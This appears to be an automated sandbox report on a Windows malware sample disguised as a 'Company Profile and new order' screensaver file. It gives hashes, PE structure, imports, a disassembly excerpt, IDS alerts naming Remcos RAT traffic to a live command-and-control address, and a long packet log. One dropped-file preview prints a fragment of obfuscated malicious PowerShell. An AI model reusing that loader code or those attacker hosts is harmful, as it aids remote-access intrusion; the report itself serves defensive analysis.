                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):311973
                                                                                          Entropy (8bit):1.262945840104735
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:YFuIGlD+g5zKkmYUXCQgRqrWnO3qGHtHbrylbKpp7yJAi1M5KPDT5no9sySeRVID:IJZm6/CZKpIPDAXQkQOXkOhQI3C
                                                                                          MD5:7289C214A5E7D8F92DB6177AE5DAF8D8
                                                                                          SHA1:5A4E368FC4FEEC77A864039E88F9E81FDBFA2629
                                                                                          SHA-256:D24127194925112E23075824087835BE75A44BAB639CB6227C7644618F053B02
                                                                                          SHA-512:6110C1277BF6F6627E6BF6458A4A8192BB5E2627BCFB683CBD0ED91BA8FAE417A1AE3A956F41A1A5D37FC4D91471F1255730552CB1266CA062F25E2B27FC0E40
                                                                                          Malicious:false
                                                                                          Preview:................R..........................................S............................#...............>.K....R..............................................ra..m........................g....................................C........[..........F.........m............I...\......................................................J............................................M............y.6....................................c..........................................f..............................................................................................m...............................................................................................................d.k........h............................................................................................'.............>.........................w...k............R................................................!...........................................................r......................v..........................%....$.
                                                                                          Process:C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (3755), with CRLF, LF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):56355
                                                                                          Entropy (8bit):5.296433386682782
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:WaLT5CxcsKDtyp82tKMAMtIDFX7a+I+peEGQO6GmJ14YNy39RS8QEw0AEEL8Rp5E:R4w+EQ+Dk/k/GYNy39g8oWsUp5+ddV4g
                                                                                          MD5:755FB54225DD285B06C369A2F5E58082
                                                                                          SHA1:F87F62424D1E437C7BD3B8C5FAD3ED40269F140A
                                                                                          SHA-256:81E5C8C7B98950C580EF3681DCA6BFB2729CC82E862DABC118A53442C4C96BC1
                                                                                          SHA-512:4EFEA102C5076A541F96A788D88DC550195ABC0A464B0D36638A8502836077F9C02E0A636C1F9654C693A7C853DF0E6B99EAF6F0D4E5FFB0F81AE64690B3C915
                                                                                          Malicious:true
                                                                                          Preview:$Fossilism=$Forbunden;.....<#Dunblde Cristatella klenavnet Sourishly Congregator astrologiens #>..<#Packboard Obtains Responsens Derbyerne Scenariers Gehenna #>..<#Advertisement Milzbrand Deklamationsnummer Programlinien Satellitbys #>..<#Freres Chokoladens Filiating Overtrace Forbrugersikkerhedskommissr #>..<#Traineeship lechuguilla Cinchonicin Jalls #>..<#Sh sniveling Stubharverne Poorhouses #>...$Sulphapyrazine = @'.Polyn.Betat$in laUInternTryghvTrykse DaddnManchdSuperahvi ebUn,erl Dom eUnpetnPortae,utoksAp iss Blte1Lreri0Sp,ac2B.ndf=Selsk$S.verTLin eeharebrEvi.ct vuloeBolignGainsafug.inFodbotOveree Krone eltofViatoeStammrShippsRegio;suk e.TegngfNonaduIntern n nbcUkul.tFors iR kehoSgernnJuri. EtfagNResetuKlaselAntiplferrae SilddbeknoeE istrTrys. B sta(Senat$DespoSFalletNonexe Subdr SndeeWithtoNonresJobbepCodd e BundcUnderiSpagnf GataiBac ic areli .yortSplanyChy o,Tomca$rotanTBib ieAab,rrR pent ntogegna,tn unctaTyl nnRa out oeh) Unet Na ci{ kaj .Unde .Surro$SorboT berah U deosuperr
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Category:dropped
                                                                                          Size (bytes):798379
                                                                                          Entropy (8bit):7.602292730912973
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:XXa6zw6GW2F+5XizizdI+9kUWM6vQWO0v1wb1EVLz56TE/n0koAHf9qo05bWYpD/:XXal655XEIimkUd0dPpL04/9X05bj
                                                                                          MD5:935BDB714D2C6A118E9C6BFD941084B8
                                                                                          SHA1:817F3F195D61D459FBBDAC24E5A4F014D927EDCF
                                                                                          SHA-256:C69B2064C89C254DBEDA8F204B3A60AB753816DDFF618BE9D593CB9839CFE09D
                                                                                          SHA-512:6915674B2CF0BBC300F18DC26FD983BB69D5DDF8EC7D00831915AE6D5602D0B770D5E785AB8B0D33B9E0C353773E2777273FF6E8383D7332A54FE2440976EDE4
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...c.d.................f...".......4............@.......................................@..........................................`...............................................................................................................text...Ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:true
                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                          Process:C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):367556
                                                                                          Entropy (8bit):7.614085263659085
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:WuszpuzJL2H20jxgw/veskcFpiNdvzbXvYeLxaLrsPp:MpaF2W0xgiGskKwNdvzbXwcx5
                                                                                          MD5:D1E068D6F404618FB2865467CA5A6C8A
                                                                                          SHA1:EA38B343CA3CC8669A1201977F453E3D59BBD904
                                                                                          SHA-256:4D22F5607F2C5579E7296AD7C71AE84DE5AF8BDA148B653E99FC5CFFEF569136
                                                                                          SHA-512:5A4C72EE6CCDC80FC0815EE9F68BFD93E22F9FD891CB5A60D843B8318AE9C538A6CE9C3AA18EE3017A1EE615ED2E485D07BD722CCC91B200BAEFF02254F85FFD
                                                                                          Malicious:false
                                                                                          Preview:.....99..\.....F...(.55..'''....................................Z.lll.....................444..L.........................(((((...]........g..........q..h..D.......nnn......((.:.........>>.........zzz.I.<...E.U....f.OO..**.^..........................=.........##......!!!!.................uuuu.........................................YYY...........Y.............\...............................................3.............g.}}.......!.))...K.....................JJJJ.........ee...............????........+...................gg........p.....gg...e.5............g...................jj..ww.......... .........!..<<<..............,,........nnnn..........P...................II........<.......k.......mmm.ssssss......((.i............................9............N...$.).;.........m..4.e........xx...n....^^.........w....s............}...dd........................II..........6.....QQQQQQ..............C.------...........................B.55.........==............................*...............l......mm
                                                                                          Process:C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):468556
                                                                                          Entropy (8bit):1.2514000212854544
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:bDg8f09zYlRoz7NY5qertTYJ5NUbuhKrrEMyjX2Zzo5qgR0ermAVJ52U/QYoWG2x:IF5oUJDTT/lotLY+HnIT+y87CqxUrL
                                                                                          MD5:C4593A1D5ED5EC3C733E913BA4147194
                                                                                          SHA1:D1964826F81325336FDB85D260571BA6BF9FBBE9
                                                                                          SHA-256:DE2575AB427C3890C936EE9AF27ADCA2E94478116A3267ECF246469390A06AAD
                                                                                          SHA-512:F3B66E25405D8C46571E0173F34420FA4D352DDFFF698F7E642811B129B508A08A08B5915B7E722AD542AADA390AFC0366CD6DCB01E3768F40620E7E36C0B9E4
                                                                                          Malicious:false
                                                                                          Preview:......................................k.........C...............................................................................`m............t.H.................................x.......................................................c..................................<........-..................H..........................r..Q......e...........................................2..............................Y...............................................................................g.............v...........L.........._.........r..G...................9.................E.....................................^........................................i...........................................o..............................c..m...............................................................G...............4....L...........................V....................................s...k....................................'............................Z...........................................
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Entropy (8bit):7.602292730912973
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:Company Profile and new order-202401127.scr.exe
                                                                                          File size:798'379 bytes
                                                                                          MD5:935bdb714d2c6a118e9c6bfd941084b8
                                                                                          SHA1:817f3f195d61d459fbbdac24e5a4f014d927edcf
                                                                                          SHA256:c69b2064c89c254dbeda8f204b3a60ab753816ddff618be9d593cb9839cfe09d
                                                                                          SHA512:6915674b2cf0bbc300f18dc26fd983bb69d5ddf8ec7d00831915ae6d5602d0b770d5e785ab8b0d33b9e0c353773e2777273ff6e8383d7332a54fe2440976ede4
                                                                                          SSDEEP:12288:XXa6zw6GW2F+5XizizdI+9kUWM6vQWO0v1wb1EVLz56TE/n0koAHf9qo05bWYpD/:XXal655XEIimkUd0dPpL04/9X05bj
                                                                                          TLSH:9D0512896F6CEF07E1A74F308DB4F7225EB85CB0895B6702DF11FE0CAA756C56A05806
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....
                                                                                          Icon Hash:9e33493c7a7c5da7
                                                                                          Entrypoint:0x4034fc
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                          Instruction
                                                                                          sub esp, 000003F8h
                                                                                          push ebp
                                                                                          push esi
                                                                                          push edi
                                                                                          push 00000020h
                                                                                          pop edi
                                                                                          xor ebp, ebp
                                                                                          push 00008001h
                                                                                          mov dword ptr [esp+20h], ebp
                                                                                          mov dword ptr [esp+18h], 0040A2D8h
                                                                                          mov dword ptr [esp+14h], ebp
                                                                                          call dword ptr [004080A4h]
                                                                                          mov esi, dword ptr [004080A8h]
                                                                                          lea eax, dword ptr [esp+34h]
                                                                                          push eax
                                                                                          mov dword ptr [esp+4Ch], ebp
                                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                                          mov dword ptr [esp+00000150h], ebp
                                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                                          call esi
                                                                                          test eax, eax
                                                                                          jne 00007F434D4C24AAh
                                                                                          lea eax, dword ptr [esp+34h]
                                                                                          mov dword ptr [esp+34h], 00000114h
                                                                                          push eax
                                                                                          call esi
                                                                                          mov ax, word ptr [esp+48h]
                                                                                          mov ecx, dword ptr [esp+62h]
                                                                                          sub ax, 00000053h
                                                                                          add ecx, FFFFFFD0h
                                                                                          neg ax
                                                                                          sbb eax, eax
                                                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                                                          not eax
                                                                                          and eax, ecx
                                                                                          mov word ptr [esp+00000148h], ax
                                                                                          cmp dword ptr [esp+38h], 0Ah
                                                                                          jnc 00007F434D4C2478h
                                                                                          and word ptr [esp+42h], 0000h
                                                                                          mov eax, dword ptr [esp+40h]
                                                                                          movzx ecx, byte ptr [esp+3Ch]
                                                                                          mov dword ptr [00429AD8h], eax
                                                                                          xor eax, eax
                                                                                          mov ah, byte ptr [esp+38h]
                                                                                          movzx eax, ax
                                                                                          or eax, ecx
                                                                                          xor ecx, ecx
                                                                                          mov ch, byte ptr [esp+00000148h]
                                                                                          movzx ecx, cx
                                                                                          shl eax, 10h
                                                                                          or eax, ecx
                                                                                          movzx ecx, byte ptr [esp+0000004Eh]
                                                                                          Programming Language:
                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x390b8.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x65560x6600dd25e171f2e0fe45f2800cc9e162537dFalse0.6652113970588235data6.456753840355455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0xa0000x1fb380x6002bc02714ee74ba781d92e94eeaccb080False0.501953125data4.040639308682379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .ndata0x2a0000x1c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0x460000x390b80x39200772060f74dab690e6f9abb0f3fe28070False0.5548199876914661data5.976433760999894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0x463880x10ba2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9963657062790087
                                                                                          RT_ICON0x56f300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.34064829054773454
                                                                                          RT_ICON0x677580x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3811751103636746
                                                                                          RT_ICON0x70c000x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.39269870609981516
                                                                                          RT_ICON0x760880x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.39100141709966935
                                                                                          RT_ICON0x7a2b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.44066390041493775
                                                                                          RT_ICON0x7c8580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.47068480300187615
                                                                                          RT_ICON0x7d9000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5311475409836065
                                                                                          RT_ICON0x7e2880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5948581560283688
                                                                                          RT_DIALOG0x7e6f00x100dataEnglishUnited States0.5234375
                                                                                          RT_DIALOG0x7e7f00x11cdataEnglishUnited States0.6056338028169014
                                                                                          RT_DIALOG0x7e9100xc4dataEnglishUnited States0.5918367346938775
                                                                                          RT_DIALOG0x7e9d80x60dataEnglishUnited States0.7291666666666666
                                                                                          RT_GROUP_ICON0x7ea380x84Targa image data - Map 32 x 2978 x 1 +1EnglishUnited States0.7348484848484849
                                                                                          RT_VERSION0x7eac00x2b4dataEnglishUnited States0.48988439306358383
                                                                                          RT_MANIFEST0x7ed780x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                          DLLImport
                                                                                          ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                          SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                          ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                          USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                          GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                          KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-12-04T06:37:09.081442+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549807104.21.13.139443TCP
                                                                                          2024-12-04T06:37:15.606210+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549825185.29.10.21363650TCP
                                                                                          2024-12-04T06:37:18.211477+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549835178.237.33.5080TCP
                                                                                          2024-12-04T06:37:20.590561+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549840185.29.10.21363650TCP
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 4, 2024 06:37:06.844115019 CET49807443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:06.844160080 CET44349807104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:06.844230890 CET49807443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:06.854728937 CET49807443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:06.854742050 CET44349807104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:08.162558079 CET44349807104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:08.162728071 CET49807443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:08.206005096 CET49807443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:08.206042051 CET44349807104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:08.206347942 CET44349807104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:08.209537029 CET49807443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:08.211353064 CET49807443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:08.259341002 CET44349807104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:09.081459999 CET44349807104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:09.081581116 CET44349807104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:09.081650019 CET49807443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:09.081721067 CET49807443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:09.093781948 CET49807443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:09.093801022 CET44349807104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:09.250875950 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:09.250976086 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:09.251065016 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:09.251348972 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:09.251379013 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:10.507937908 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:10.508142948 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:10.511358023 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:10.511379957 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:10.511614084 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:10.511683941 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:10.511981964 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:10.559333086 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.615360975 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.615413904 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.615430117 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.615464926 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.615474939 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.615483046 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.615523100 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.615523100 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.615534067 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.615545034 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.615581989 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.615607023 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.615983009 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.616044044 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.624273062 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.624330044 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.624408960 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.624463081 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.632709026 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.632766008 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.632838011 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.632884979 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.735269070 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.735377073 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.735409021 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.735507011 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.816715002 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.816777945 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.820272923 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.820323944 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.820384026 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.820430040 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.827739000 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.827811003 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.827862978 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.827914000 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.836680889 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.836730003 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.836841106 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.836884975 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.844105005 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.844150066 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.851577997 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.851636887 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.851656914 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.851703882 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.857331038 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.857383966 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.857398033 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.857414961 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.857445955 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.857465029 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.864725113 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.864783049 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.864857912 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.864905119 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.873725891 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.873797894 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.873811960 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.873855114 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.880673885 CET44349813104.21.13.139192.168.2.5
